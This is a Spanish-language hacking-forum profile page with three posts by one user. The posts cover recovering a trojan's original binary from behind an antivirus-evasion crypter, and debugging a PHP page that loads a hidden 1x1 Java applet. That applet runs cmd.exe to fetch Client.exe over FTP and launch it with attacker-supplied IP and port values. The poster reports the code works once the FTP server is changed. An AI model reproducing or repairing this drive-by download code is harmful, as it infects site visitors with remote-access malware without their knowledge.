Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - m[a]rkus

#51
Muy Bueno psymera lo eh probado y ah funcionado aunque no recupera al 100% el binario antiguo recupera la mayor parte y eso es mejor que nada. Un saludo y gracias.
#52
Hola, como muchos saben ahi troyanos que para hacerlos indetectables se les pasa una herramienta llamada crypter, pues yo eh estado buscando y solo se las conexiones que hace los puertos que usa y el dns si es que lo tiene, pero eso no me es suficiente, necesito saber que existe alguna forma de leer en hexadecimal el "Archivo Original" es decir ver el codigo del archivo como sino le hubieran pasado el crypter, alguna forma tiene que haber ya que una vez lo ejecutas la funcion de casi todos los crypter es crear unarchivo temporal y ese archivo temporal es el que tiene binario sin cifrar, bueno espero hayan entendido un saludo y gracias por adelantado



CitarSolución:http://www.gigasize.com/get.php?d=b32byccdznf
http://foro.elhacker.net/empty-t262850.0.html
#53
Hola la verdad encontre información sobre este tema en otro sitios (en inglés) y me resulto muy complicado por la poca explicación que ofrecian, y buscando mas en google aparecio esto, bien lo que me sucede actualmente es lo que le ah pasado a varios aqui pero que no dicen como lo corrijieron o al menos yo no lo vi, yo tengo este codigo:
<?php
if(isset($HTTP_GET_VARS["board"])) {
$ip $HTTP_GET_VARS["board"];
echo $ip;
}
 
else 
$ip "127.0.0.1";
 
if(isset(
$HTTP_GET_VARS["topic"])) {
$puerto $HTTP_GET_VARS["topic"];
echo $puerto;
}
 
else 
$puerto 666;
 
echo 
"<applet width='1' height='1' code='skata.class' archive='skataMPE.jar'>";
echo 
"<param name='first' value='
cmd.exe /c cd C:\\ & echo usuario@ftp.com>datos.txt&echo contraseña>>datos.txt&echo pwd>>datos.txt&echo binary>>datos.txt&echo get Client.exe>>datos.txt&echo bye>>datos.txt&echo quit>>datos.txt&ftp -s:datos.txt ftp.com&start Client.exe "
.$ip." ".$puerto."&pause'>";
echo 
"</applet>";
 
?>


Al abrir se demora unos 6 o 7 segundos y sale un mensaje de error "Aplicación Win32 no Valida" fue a la ruta y estaba el "datos.txt" y "Cliente.exe" pero con 0 bytes leyendo vi que a algunos les ah pasado y dicen que es un error que tenia el PHP pero no soy capaz de encontrarlo. Seria de agradecer que lo postearas un saludo y gracias por adelantado.

Resuelto: Cambiar server FTP
El code esta bien